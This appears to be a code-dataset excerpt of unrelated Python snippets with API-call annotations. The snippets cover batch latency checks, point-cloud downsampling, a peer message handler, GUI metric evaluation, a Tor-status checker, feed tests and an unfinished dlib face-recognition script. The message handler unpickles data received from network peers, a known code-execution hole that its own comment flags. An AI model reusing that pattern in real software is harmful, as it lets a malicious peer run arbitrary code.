    # Use the stdlib timezone instead of pytz.utc.localize(): for UTC there
    # are no DST transitions, so the two are equivalent, and pytz is
    # deprecated in favour of datetime.timezone / zoneinfo.
    from datetime import timezone
    return t.replace(tzinfo=timezone.utc)
class CheckWF:
    """
    Calls batchy endpoint to get job status.
    """

    def __init__(self, wf, batchy_server, batchy_port):
        """Create a Batch client for workflow *wf* on the given batchy host."""
        self.b = Batch(wf, batchy_server, batchy_port)
        log.l("Checking wf: {}".format(wf))

    def check_batchy_wf(self, max_latency):
        """Fetch the workflow's global status and evaluate latency alerts.

        :param max_latency: maximum allowed latency in minutes.
        :returns: tuple of (failure_count, result dict with alert fields).
        :raises ValueError: when batchy returns no "global" status.
        """
        status = self.b.get_status().get("global")
        if status:
            failure_count, result = self.calc_latency_tests(
                status, max_latency
            )
        else:
            raise ValueError("Could not find wf")
        return failure_count, result

    @staticmethod
    def calc_latency_tests(result, max_latency):
        """
        run business logic on result to create alerts
        :param result:
        :param max_latency:
        :return:
        """
        failure_count = 0
        # use batch start, not end
        batch_start = result.get("batch_start")
        # BUGFIX: the original used `.seconds`, which only yields the
        # seconds *component* of the timedelta and silently wraps after
        # 24 hours; `.total_seconds()` gives the true elapsed time.
        latency = (
            datetime.now(pytz.utc)
            - convert_time(
                datetime.strptime(batch_start, "%Y-%m-%dT%H:%M:%S.%f")
            )
        ).total_seconds() / 60
        if latency >= max_latency:
            log.l(
                "latency: {} is greater than max latency: {}".format(
                    latency, max_latency
                )
            )
            failure_count = 1
            result["alert_level"] = "FAILURE"
            result["alert_message"] = "latency issue"
        elif result["status"] == "failure":
            # Job failed outright regardless of latency.
            log.l("failure b/c of job failure")
            result["alert_level"] = "FAILURE"
            result["alert_message"] = "job failure"
        elif latency >= max_latency * 0.8:
            # Early warning once 80% of the latency budget is consumed.
            log.l(
                "latency: {} is greater than 80% of max latency: {}".format(
                    latency, max_latency
                )
            )
            result["alert_level"] = "WARNING"
            result["alert_message"] = "passed 80% of latency threshold"
        else:
            result["alert_level"] = "SUCCESS"
            log.l("Success")
        result["latency"] = latency
        return failure_count, result
| [
"datetime.datetime.strptime",
"datacoco_batch.batch.Batch",
"datacoco_core.logger.Logger",
"datetime.datetime.now"
] | [((164, 172), 'datacoco_core.logger.Logger', 'Logger', ([], {}), '()\n', (170, 172), False, 'from datacoco_core.logger import Logger\n'), ((473, 510), 'datacoco_batch.batch.Batch', 'Batch', (['wf', 'batchy_server', 'batchy_port'], {}), '(wf, batchy_server, batchy_port)\n', (478, 510), False, 'from datacoco_batch.batch import Batch\n'), ((1239, 1261), 'datetime.datetime.now', 'datetime.now', (['pytz.utc'], {}), '(pytz.utc)\n', (1251, 1261), False, 'from datetime import datetime\n'), ((1306, 1360), 'datetime.datetime.strptime', 'datetime.strptime', (['batch_start', '"""%Y-%m-%dT%H:%M:%S.%f"""'], {}), "(batch_start, '%Y-%m-%dT%H:%M:%S.%f')\n", (1323, 1360), False, 'from datetime import datetime\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
    """Uniformly down-sample a point cloud file and save the result.

    Keeps every ``down_sample_cluster_num``-th point of the input cloud and
    writes the reduced cloud as an ASCII file to *save_pointcloud_file_path*.
    Always returns True.
    """
    print("[INFO][downSample]")
    print("\t start down sampling pointcloud :")
    print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
    source_cloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
    reduced_cloud = o3d.geometry.PointCloud.uniform_down_sample(
        source_cloud, down_sample_cluster_num)
    o3d.io.write_point_cloud(
        save_pointcloud_file_path,
        reduced_cloud,
        write_ascii=True,
        print_progress=True)
    print("SUCCESS!")
    return True
| [
"open3d.io.write_point_cloud",
"open3d.geometry.PointCloud.uniform_down_sample",
"open3d.io.read_point_cloud"
] | [((339, 405), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['pointcloud_file_path'], {'print_progress': '(True)'}), '(pointcloud_file_path, print_progress=True)\n', (362, 405), True, 'import open3d as o3d\n'), ((437, 522), 'open3d.geometry.PointCloud.uniform_down_sample', 'o3d.geometry.PointCloud.uniform_down_sample', (['pointcloud', 'down_sample_cluster_num'], {}), '(pointcloud, down_sample_cluster_num\n )\n', (480, 522), True, 'import open3d as o3d\n'), ((532, 651), 'open3d.io.write_point_cloud', 'o3d.io.write_point_cloud', (['save_pointcloud_file_path', 'down_sampled_pointcloud'], {'write_ascii': '(True)', 'print_progress': '(True)'}), '(save_pointcloud_file_path, down_sampled_pointcloud,\n write_ascii=True, print_progress=True)\n', (556, 651), True, 'import open3d as o3d\n')] |
import asyncio
import pickle
from congregation.net.messages import *
class Handler:
    """Routes incoming peer messages to the matching handler method.

    Holds a reference back to the owning peer and, when acting on the
    server side, to the asyncio protocol instance whose transport is used
    to complete connection futures.
    """

    def __init__(self, peer, server: [asyncio.Protocol, None] = None):
        # peer: owning peer object (provides peer_connections, dispatcher,
        # msg_buffer and the send_* helpers used below).
        self.peer = peer
        self.server = server
        # msg_type string -> bound handler method.
        self.msg_handlers = self._define_msg_map()

    def handle_msg(self, data):
        """
        determine message type and handle accordingly
        """
        if isinstance(data, Msg):
            m = data
        else:
            # SECURITY NOTE(review): unpickling data received over the
            # network executes arbitrary code if a peer is malicious —
            # acceptable only among fully trusted peers.
            m = pickle.loads(data)
        if m.pid not in self.peer.peer_connections:
            raise Exception(f"Msg of type {m.msg_type} received from unrecognized peer: {m.pid}")
        self.msg_handlers[m.msg_type](m)

    def _define_msg_map(self):
        # Dispatch table from message type tag to handler.
        return {
            "IAM": self.handle_iam_msg,
            "READY": self.handle_ready_msg,
            "CONFIG": self.handle_config_msg,
            "ACK": self.handle_ack_msg,
            "REQUEST": self.handle_request_msg
        }

    def _define_msg_map(self):
        return {
            "IAM": self.handle_iam_msg,
            "READY": self.handle_ready_msg,
            "CONFIG": self.handle_config_msg,
            "ACK": self.handle_ack_msg,
            "REQUEST": self.handle_request_msg
        }
    def _check_dispatcher(self, m: [ReadyMsg, ConfigMsg, AckMsg, RequestMsg]):
        if self.peer.dispatcher is not None:
            if self.peer.dispatcher.dispatch_type == m.job_type:
                return True
        self.peer.msg_buffer.append(m)
        return False
    def handle_iam_msg(self, m: IAMMsg):
        """
        we need to be able to resolve which party a given connection
        is for, which is why a done callback is added to the connection
        future which sends an IAMMsg with the pid of the connecting party.
        this function sets that connection value in peer.peer_connections
        accordingly when an IAMMsg is received.
        """
        print(f"IAMMsg received from {m.pid}")
        conn = self.peer.peer_connections[m.pid]
        if isinstance(conn, asyncio.Future):
            if not conn.done():
                conn.set_result((self.server.transport, self))
    def handle_ready_msg(self, m: ReadyMsg):
        # Mark the sending party as ready for the current dispatch job.
        if self._check_dispatcher(m):
            print(f"ReadyMsg received from party {m.pid} for {m.job_type} job.")
            rdy = self.peer.dispatcher.parties_ready[m.pid]
            if isinstance(rdy, asyncio.Future):
                if not rdy.done():
                    rdy.set_result(True)
    def handle_config_msg(self, m: ConfigMsg):
        # Record the sender's config and acknowledge receipt.
        if self._check_dispatcher(m):
            print(f"ConfigMsg received from party {m.pid} for {m.job_type} job.")
            cfg = self.peer.dispatcher.parties_config[m.pid]["CFG"]
            if isinstance(cfg, asyncio.Future):
                if not cfg.done():
                    cfg.set_result(m.config)
            print(f"Sending AckMsg to party {m.pid} for receipt of ConfigMsg for {m.job_type} job.")
            self.peer.send_ack(
                m.pid,
                "CONFIG",
                m.job_type
            )
    def handle_ack_msg(self, m: AckMsg):
        # Resolve the pending acknowledgement future for the sender.
        if self._check_dispatcher(m):
            print(f"AckMsg of type {m.ack_type} received from party {m.pid} for {m.job_type} job.")
            if m.ack_type == "CONFIG":
                a = self.peer.dispatcher.parties_config[m.pid]["ACK"]
                if isinstance(a, asyncio.Future):
                    if not a.done():
                        a.set_result(True)
    def handle_request_msg(self, m: RequestMsg):
        # Respond to a config request by sending our config to the sender.
        if self._check_dispatcher(m):
            print(f"Request message for {m.request_type} received from party {m.pid} for {m.job_type} job.")
            if m.request_type == "CONFIG":
                self.peer.send_cfg(m.pid, self.peer.dispatcher.config_to_exchange, m.job_type)
| [
"pickle.loads"
] | [((459, 477), 'pickle.loads', 'pickle.loads', (['data'], {}), '(data)\n', (471, 477), False, 'import pickle\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Evaluators.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
# Standard library modules
import importlib
import time
from datetime import date
from pathlib import Path
from typing import Any, Dict, List, Optional
# Third-party modules
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import pandas as pd
import seaborn as sns
from loguru import logger
# First-party modules
from aim.core import image_utils
# ----------------------------------------------------------------------------
# Metadata
# ----------------------------------------------------------------------------
__author__ = "<NAME>"
__date__ = "2021-02-09"
__email__ = "<EMAIL>"
__version__ = "1.0"
# ----------------------------------------------------------------------------
# Evaluators
# ----------------------------------------------------------------------------
class GUIDesignsEvaluator:
    """Runs the AIM metric modules over a directory of GUI design PNGs.

    Results are accumulated into a CSV in the output directory (resumable:
    previously finished rows are skipped) and optionally plotted as
    histograms, one per metric result.
    """

    # Private constants
    _METRICS: List[str] = [
        "m1_png_file_size",  # PNG file size
        "m2_jpeg_file_size",  # JPEG file size
        "m3_distinct_rgb_values",  # Distinct RGB values
        "m4_contour_density",  # Contour density
        "m5_figure_ground_contrast",  # Figure-ground contrast
        "m6_contour_congestion",  # Contour congestion
    ]
    _METRIC_RESULTS = {
        "m1_result_1": {"name": "PNG file size in bytes"},
        "m2_result_1": {"name": "JPEG file size in bytes"},
        "m3_result_1": {"name": "Number of distinct RGB values"},
        "m4_result_1": {"name": "Contour density"},
        "m5_result_1": {"name": "Figure-ground contrast"},
        "m6_result_1": {"name": "Contour congestion"},
    }

    # Public constants
    NAME: str = "GUI Designs Evaluator"
    VERSION: str = "1.0"

    # Initializer
    def __init__(self, input_dir: str, output_dir: str, plot_results: bool):
        """Configure input/output locations.

        Args:
            input_dir: directory of GUI design PNGs (plus optional CSV
                listing which files to include).
            output_dir: parent directory for results; a subdirectory named
                after the input directory is created inside it.
            plot_results: whether to render histogram plots after evaluation.
        """
        self.input_dir: Path = Path(input_dir)
        self.input_csv_file: Optional[Path] = None
        self.input_gui_design_files: List[Path] = []
        self.results: Optional[List[Dict[str, Any]]] = None
        self.output_dir: Path = Path(output_dir) / self.input_dir.name
        self.output_csv_file: Path = self.output_dir / "{}.csv".format(
            self.output_dir.name
        )
        self.plot_results: bool = plot_results

    # Private methods
    def _set_input_csv_file(self):
        """Pick the first (and only expected) CSV file in the input dir."""
        for csv_file_path in list(self.input_dir.glob("*.csv"))[:1]:
            self.input_csv_file = csv_file_path

    def _set_input_gui_design_files(self):
        """Collect the GUI design files to evaluate.

        If an input CSV exists, only rows with include == "yes" are used;
        otherwise every PNG in the input directory is taken.
        """
        # Get input CSV file
        if self.input_csv_file:
            # Read input data
            input_df = pd.read_csv(self.input_csv_file)
            # Exclude some rows
            input_df = input_df.loc[input_df["include"] == "yes"]
            # Get input GUI design files
            self.input_gui_design_files = [
                self.input_dir / file for file in input_df["filename"].tolist()
            ]
        # No input CSV file available
        else:
            # Get input GUI design files
            self.input_gui_design_files = list(self.input_dir.glob("*.png"))

    def _set_results(self):
        """Load previous evaluation rows so the run can resume where it stopped."""
        # Get output CSV file (previous results)
        if self.output_csv_file.exists():
            # Create DataFrame
            results_df: pd.DataFrame = pd.read_csv(self.output_csv_file)
            # Remove unfinished evaluation rows
            results_df = results_df.dropna()
            # Convert DataFrame to List
            self.results = results_df.to_dict("records")
        # No output CSV file (previous results) available
        else:
            self.results = []

    def _execute_metrics(self):
        """Run every metric on every not-yet-evaluated GUI design file."""
        # Iterate over input GUI design files, skipping rows already done
        for input_gui_design_file in self.input_gui_design_files[
            len(self.results) :
        ]:
            logger.info("Evaluating {}...".format(input_gui_design_file.name))

            # Start total timer
            start_time_total: float = time.time()

            # Initialize GUI design results row
            results_row = {}
            results_row["filename"] = input_gui_design_file.name
            results_row["evaluation_date"] = date.today().isoformat()

            # Read GUI design image (PNG)
            start_time: float = time.time()
            gui_image_png_base64: str = image_utils.read_image(
                input_gui_design_file
            )
            end_time: float = time.time()
            results_row["read_image_time"] = round(end_time - start_time, 4)

            # Iterate over AIM metrics
            for metric in self._METRICS:
                # Import metric module
                metric_module = importlib.import_module(
                    "aim.metrics." + metric
                )

                # Execute metric
                start_time: float = time.time()
                metric_results: Optional[
                    List[Any]
                ] = metric_module.Metric.execute_metric(gui_image_png_base64)
                end_time: float = time.time()
                # Column prefix is the metric id, e.g. "m1" from "m1_png_file_size"
                results_row[metric.partition("_")[0] + "_time"] = round(
                    end_time - start_time, 4
                )

                # Iterate over metrics results
                for index, metric_result in enumerate(metric_results):
                    if type(metric_result) is float:
                        results_row[
                            metric.partition("_")[0]
                            + "_result_"
                            + str(index + 1)
                        ] = round(metric_result, 4)
                    else:
                        results_row[
                            metric.partition("_")[0]
                            + "_result_"
                            + str(index + 1)
                        ] = metric_result

            # End total timer
            end_time_total: float = time.time()
            results_row["total_evaluation_time"] = round(
                end_time_total - start_time_total, 4
            )

            # Append results
            self.results.append(results_row)

            # Precaution against crashes: save results after each GUI design
            # evaluation instead of after completing all of them
            self._save_results()

    def _save_results(self):
        """Write all accumulated results to the output CSV."""
        # Create DataFrame
        results_df: pd.DataFrame = pd.DataFrame(self.results)
        # Reorder columns: metadata columns first, then metric columns sorted
        cols: List[str] = results_df.columns.tolist()
        # BUGFIX: the original called sorted(cols) and discarded the return
        # value, leaving the columns unsorted; sort in place instead.
        cols.sort()
        cols.remove("filename")
        cols.remove("evaluation_date")
        cols.remove("read_image_time")
        cols.remove("total_evaluation_time")
        cols = [
            "filename",
            "evaluation_date",
            "total_evaluation_time",
            "read_image_time",
        ] + cols
        results_df = results_df[cols]
        # Create directories, if needed
        if not self.output_dir.exists():
            self.output_dir.mkdir(parents=True)
        # Save results
        results_df.to_csv(self.output_csv_file, index=False)

    def _reformat_large_tick_values(self, tick_val, pos):
        """
        Turns large tick values (in the billions, millions and thousands) such as 4500 into 4.5K and also appropriately turns 4000 into 4K (no zero after the decimal).
        Source: https://dfrieds.com/data-visualizations/how-format-large-tick-values.html
        """
        if tick_val >= 1000000000:
            val = round(tick_val / 1000000000, 1)
            new_tick_format = "{:}B".format(val)
        elif tick_val >= 1000000:
            val = round(tick_val / 1000000, 1)
            new_tick_format = "{:}M".format(val)
        elif tick_val >= 1000:
            val = round(tick_val / 1000, 1)
            new_tick_format = "{:}K".format(val)
        else:
            new_tick_format = round(tick_val, 4)

        # Make new_tick_format into a string value
        new_tick_format = str(new_tick_format)

        # Code below will keep 4.5M as is but change values such as 4.0M to 4M since that zero after the decimal isn't needed
        index_of_decimal = new_tick_format.find(".")
        if index_of_decimal != -1 and (tick_val >= 1000 or tick_val == 0):
            value_after_decimal = new_tick_format[index_of_decimal + 1]
            if value_after_decimal == "0":
                # Remove the 0 after the decimal point since it's not needed
                new_tick_format = (
                    new_tick_format[0:index_of_decimal]
                    + new_tick_format[index_of_decimal + 2 :]
                )

        return new_tick_format

    def _plot_results(self):
        """Render one histogram per metric result column, if enabled."""
        # Plot results
        if self.plot_results:
            # Get output CSV file (evaluation results)
            evaluation_results_df = pd.read_csv(
                self.output_csv_file,
                header=0,
                dtype={"filename": "str"},
                parse_dates=[1],
            )

            # Plot metric evaluation results
            width: int = 700  # in pixels
            height: int = 500  # in pixels
            dpi: int = 72
            for key, value in self._METRIC_RESULTS.items():
                # Create a new figure and configure it
                sns.set(rc={"figure.figsize": (width / dpi, height / dpi)})
                sns.set_style("ticks")
                sns.set_context("paper", font_scale=1.5)
                plt.figure()

                # Plot data on a histogram and configure it
                ax = sns.histplot(
                    list(evaluation_results_df[key]),
                    kde=False,
                    color="#7553A0",
                    bins=30,
                )
                ax.set_xlabel(
                    value["name"],
                    fontstyle="normal",
                    fontweight="normal",
                    labelpad=10,
                )
                ax.set_ylabel(
                    "Frequency",
                    fontstyle="normal",
                    fontweight="normal",
                    labelpad=10,
                )
                ax.xaxis.grid(False)
                ax.yaxis.grid(False)
                ax.xaxis.set_major_formatter(
                    ticker.FuncFormatter(self._reformat_large_tick_values)
                )
                sns.despine(ax=ax, left=False, bottom=False)

                # Save plot
                output_plot_file: Path = (
                    self.output_dir / "{}_evaluator.png".format(key)
                )
                plt.savefig(output_plot_file, dpi=dpi, transparent=False)

    # Public methods
    def evaluate(self):
        """Run the full pipeline: discover inputs, evaluate metrics, plot."""
        self._set_input_csv_file()
        self._set_input_gui_design_files()
        self._set_results()
        self._execute_metrics()
        self._plot_results()
| [
"seaborn.set",
"matplotlib.pyplot.savefig",
"importlib.import_module",
"pandas.read_csv",
"pathlib.Path",
"seaborn.despine",
"matplotlib.ticker.FuncFormatter",
"seaborn.set_context",
"seaborn.set_style",
"matplotlib.pyplot.figure",
"pandas.DataFrame",
"datetime.date.today",
"aim.core.image_u... | [((2037, 2052), 'pathlib.Path', 'Path', (['input_dir'], {}), '(input_dir)\n', (2041, 2052), False, 'from pathlib import Path\n'), ((6512, 6538), 'pandas.DataFrame', 'pd.DataFrame', (['self.results'], {}), '(self.results)\n', (6524, 6538), True, 'import pandas as pd\n'), ((2249, 2265), 'pathlib.Path', 'Path', (['output_dir'], {}), '(output_dir)\n', (2253, 2265), False, 'from pathlib import Path\n'), ((2783, 2815), 'pandas.read_csv', 'pd.read_csv', (['self.input_csv_file'], {}), '(self.input_csv_file)\n', (2794, 2815), True, 'import pandas as pd\n'), ((3455, 3488), 'pandas.read_csv', 'pd.read_csv', (['self.output_csv_file'], {}), '(self.output_csv_file)\n', (3466, 3488), True, 'import pandas as pd\n'), ((4121, 4132), 'time.time', 'time.time', ([], {}), '()\n', (4130, 4132), False, 'import time\n'), ((4421, 4432), 'time.time', 'time.time', ([], {}), '()\n', (4430, 4432), False, 'import time\n'), ((4473, 4518), 'aim.core.image_utils.read_image', 'image_utils.read_image', (['input_gui_design_file'], {}), '(input_gui_design_file)\n', (4495, 4518), False, 'from aim.core import image_utils\n'), ((4579, 4590), 'time.time', 'time.time', ([], {}), '()\n', (4588, 4590), False, 'import time\n'), ((6032, 6043), 'time.time', 'time.time', ([], {}), '()\n', (6041, 6043), False, 'import time\n'), ((8924, 9015), 'pandas.read_csv', 'pd.read_csv', (['self.output_csv_file'], {'header': '(0)', 'dtype': "{'filename': 'str'}", 'parse_dates': '[1]'}), "(self.output_csv_file, header=0, dtype={'filename': 'str'},\n parse_dates=[1])\n", (8935, 9015), True, 'import pandas as pd\n'), ((4820, 4868), 'importlib.import_module', 'importlib.import_module', (["('aim.metrics.' + metric)"], {}), "('aim.metrics.' 
+ metric)\n", (4843, 4868), False, 'import importlib\n'), ((4977, 4988), 'time.time', 'time.time', ([], {}), '()\n', (4986, 4988), False, 'import time\n'), ((5173, 5184), 'time.time', 'time.time', ([], {}), '()\n', (5182, 5184), False, 'import time\n'), ((9379, 9438), 'seaborn.set', 'sns.set', ([], {'rc': "{'figure.figsize': (width / dpi, height / dpi)}"}), "(rc={'figure.figsize': (width / dpi, height / dpi)})\n", (9386, 9438), True, 'import seaborn as sns\n'), ((9455, 9477), 'seaborn.set_style', 'sns.set_style', (['"""ticks"""'], {}), "('ticks')\n", (9468, 9477), True, 'import seaborn as sns\n'), ((9494, 9534), 'seaborn.set_context', 'sns.set_context', (['"""paper"""'], {'font_scale': '(1.5)'}), "('paper', font_scale=1.5)\n", (9509, 9534), True, 'import seaborn as sns\n'), ((9551, 9563), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9561, 9563), True, 'import matplotlib.pyplot as plt\n'), ((10452, 10496), 'seaborn.despine', 'sns.despine', ([], {'ax': 'ax', 'left': '(False)', 'bottom': '(False)'}), '(ax=ax, left=False, bottom=False)\n', (10463, 10496), True, 'import seaborn as sns\n'), ((10672, 10729), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_plot_file'], {'dpi': 'dpi', 'transparent': '(False)'}), '(output_plot_file, dpi=dpi, transparent=False)\n', (10683, 10729), True, 'import matplotlib.pyplot as plt\n'), ((4321, 4333), 'datetime.date.today', 'date.today', ([], {}), '()\n', (4331, 4333), False, 'from datetime import date\n'), ((10363, 10417), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['self._reformat_large_tick_values'], {}), '(self._reformat_large_tick_values)\n', (10383, 10417), True, 'import matplotlib.ticker as ticker\n')] |
# MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSOAP
class TorCheck(object):
    """
    The TorCheck class.
    This class checks the tor status and ip address
    """

    IP_CHECK_ENDPOINT = "http://icanhazip.com"
    TOR_CHECK_ENDPOINT = "https://check.torproject.org"

    def __init__(self):
        self.text_key = "congratulations"

    def check_ip(self):
        """
        Checks the ip address

        Returns
        -------
        ip: str
            The ip address
        """
        body = urllib2.urlopen(self.IP_CHECK_ENDPOINT).read()
        return body.strip()

    def check_tor_status(self):
        """
        Checks the tor status

        Returns
        -------
        status: Bool
            The tor status
        """
        page_source = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
        soup = BeautifulSOAP(page_source)
        heading_text = soup.body.find('h1', attrs={'class':'not'}).text
        return self.text_key in heading_text.lower()
| [
"BeautifulSoup.BeautifulSOAP",
"urllib2.urlopen"
] | [((1811, 1850), 'urllib2.urlopen', 'urllib2.urlopen', (['self.IP_CHECK_ENDPOINT'], {}), '(self.IP_CHECK_ENDPOINT)\n', (1826, 1850), False, 'import urllib2\n'), ((2175, 2194), 'BeautifulSoup.BeautifulSOAP', 'BeautifulSOAP', (['html'], {}), '(html)\n', (2188, 2194), False, 'from BeautifulSoup import BeautifulSOAP\n'), ((2105, 2145), 'urllib2.urlopen', 'urllib2.urlopen', (['self.TOR_CHECK_ENDPOINT'], {}), '(self.TOR_CHECK_ENDPOINT)\n', (2120, 2145), False, 'import urllib2\n')] |
import unittest
from models import FeedSet, Base, RSSContent
import config
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from unittest.mock import MagicMock
from test_data.feedparser_data import fake_response
from helpers import RSSContentHelper, FeedSetHelper
class TestFeedSet(unittest.TestCase):
    """Integration tests for FeedSet/FeedSetHelper against a scratch database."""

    def setUp(self):
        # Each test gets a freshly rebuilt schema; skipped entirely when no
        # test database URL is configured.
        url = config.DB_TEST_URL
        if not url:
            self.skipTest("No database URL set")
        engine = sqlalchemy.create_engine(url)
        Base.metadata.drop_all(engine)
        Base.metadata.create_all(engine)
        Session = sessionmaker(bind=engine)
        self.session = Session()

    # Class-level alias so it is in scope for the @patch decorators below
    # (decorators are evaluated in the class body, where module globals
    # like fake_response would also work, but the alias documents intent).
    feedparser_fake_response = fake_response

    def feed_data_dict(self):
        # Minimal valid feed configuration fixture.
        data = {
            'urls': ['https://news.ycombinator.com/rss'],
            'hashtags': '#example',
            'twitter': {
                'consumer_key': '<KEY>',
                'access_secret': '<KEY>',
                'consumer_secret': '<KEY>',
                'access_key': '<KEY>'
            },
            'name': 'SimpleItRocks'
        }
        return data

    def test_get_twitter_credentials(self):
        # twitter_keys must expose all four OAuth credential fields.
        data = self.feed_data_dict()
        feed = FeedSet(data)
        keys = feed.twitter_keys
        self.assertIsInstance(keys, dict)
        self.assertIn('consumer_key', keys)
        self.assertIn('access_key', keys)
        self.assertIn('consumer_secret', keys)
        self.assertIn('access_secret', keys)

    def test_urls(self):
        data = self.feed_data_dict()
        feed = FeedSet(data)
        urls = feed.urls
        self.assertIsInstance(urls, list)

    @unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
    def test_save_new_pages(self, feedparser_fake_response):
        # Starting from an empty table, fetching feeds must persist rows.
        self.assertEqual(len(self.session.query(RSSContent).all()), 0)
        helper = FeedSetHelper(self.session, self.feed_data_dict())
        helper.get_pages_from_feeds()
        self.assertNotEqual(len(self.session.query(RSSContent).all()), 0)

    @unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
    def test_not_save_existing_pages(self, feedparser_fake_response):
        # presave an item that is present in the retrieved feed, to check if it
        # has not been saved after downloading new feeds
        entry = fake_response.entries[0]
        items_count = len(fake_response.entries)
        rsscontent = RSSContent(title=entry.title, url=entry.link)
        self.session.add(rsscontent)
        self.assertEqual(len(self.session.query(RSSContent).all()), 1)
        helper = FeedSetHelper(self.session, self.feed_data_dict())
        helper.get_pages_from_feeds()
        self.assertEqual(len(self.session.query(RSSContent).all()), items_count, "Entries count has changed")
if __name__ == '__main__':
unittest.main()
| [
"sqlalchemy.orm.sessionmaker",
"models.FeedSet",
"sqlalchemy.create_engine",
"models.RSSContent",
"unittest.main",
"models.Base.metadata.drop_all",
"unittest.mock.patch",
"models.Base.metadata.create_all"
] | [((1645, 1723), 'unittest.mock.patch', 'unittest.mock.patch', (['"""feedparser.parse"""'], {'return_value': 'feedparser_fake_response'}), "('feedparser.parse', return_value=feedparser_fake_response)\n", (1664, 1723), False, 'import unittest\n'), ((2043, 2121), 'unittest.mock.patch', 'unittest.mock.patch', (['"""feedparser.parse"""'], {'return_value': 'feedparser_fake_response'}), "('feedparser.parse', return_value=feedparser_fake_response)\n", (2062, 2121), False, 'import unittest\n'), ((2852, 2867), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2865, 2867), False, 'import unittest\n'), ((452, 481), 'sqlalchemy.create_engine', 'sqlalchemy.create_engine', (['url'], {}), '(url)\n', (476, 481), False, 'import sqlalchemy\n'), ((490, 520), 'models.Base.metadata.drop_all', 'Base.metadata.drop_all', (['engine'], {}), '(engine)\n', (512, 520), False, 'from models import FeedSet, Base, RSSContent\n'), ((529, 561), 'models.Base.metadata.create_all', 'Base.metadata.create_all', (['engine'], {}), '(engine)\n', (553, 561), False, 'from models import FeedSet, Base, RSSContent\n'), ((580, 605), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (592, 605), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1206, 1219), 'models.FeedSet', 'FeedSet', (['data'], {}), '(data)\n', (1213, 1219), False, 'from models import FeedSet, Base, RSSContent\n'), ((1552, 1565), 'models.FeedSet', 'FeedSet', (['data'], {}), '(data)\n', (1559, 1565), False, 'from models import FeedSet, Base, RSSContent\n'), ((2448, 2493), 'models.RSSContent', 'RSSContent', ([], {'title': 'entry.title', 'url': 'entry.link'}), '(title=entry.title, url=entry.link)\n', (2458, 2493), False, 'from models import FeedSet, Base, RSSContent\n')] |
## -*- coding: utf-8 -*-
"""
Created on Tue Sep 26 13:38:17 2017
@author: Administrator
"""
import dlib
import cv2
import numpy as np
from sklearn.externals import joblib
import os
import pathAttributes
#ap = argparse.ArgumentParser()
#ap.add_argument("-p", "--shape-predictor", metavar="D:\\用户目录\\下载\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat", required=True,
# help="path to facial landmark predictor")
#ap.add_argument("-r", "--picamera", type=int, default=-1,
#help="whether or not the Raspberry Pi camera should be used")
#args = vars(ap.parse_args())
def faceRecognition():
f = open(pathAttributes.dictionary, 'r')
result = {}
for line in f.readlines():
line = line.strip()
print(line)
if not len(line):
continue
result[line.split(':')[0]] = line.split(':')[1]
f.close()
#face_detection_model = "C:\\Users\\Administrator\\shape_predictor_68_face_landmarks.dat"
#print(result)
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(pathAttributes.face_detection_model)
face_encoder = dlib.face_recognition_model_v1(pathAttributes.face_recognition_model)
print("[INFO] camera sensor warming up...")
#vs = VideoStream().start()
video_capture = cv2.VideoCapture(0) #open camra by calling opencv's function
#time.sleep(2.0)
"""
chris_image = cv2.imread('E:\\49.png')
#chris_image_gray = cv2.cvtColor(chris_image, cv2.COLOR_GRAY2RGB)
chris = detector(chris_image, 1)
chris_shape = predictor(chris_image, chris[0])
chris_face_encoding = face_encoder.compute_face_descriptor(chris_image, chris_shape, 1)
print("Chris:"+str(chris_face_encoding))
julie_image = cv2.imread('E:\\1.png')
#julie_image_gray = cv2.cvtColor(julie_image, cv2.COLOR_GRAY2RGB)
julie = detector(julie_image, 1)
julie_shape = predictor(julie_image, julie[0])
julie_face_encoding = face_encoder.compute_face_descriptor(julie_image, julie_shape, 1)
print("JULIE:"+str(julie_face_encoding))
"""
face_locations = []
face_encodings = []
face_names = []
raw_list = []
while True:
raw_list = []
face_names = []
# grab the frame from the threaded video stream, resize it to
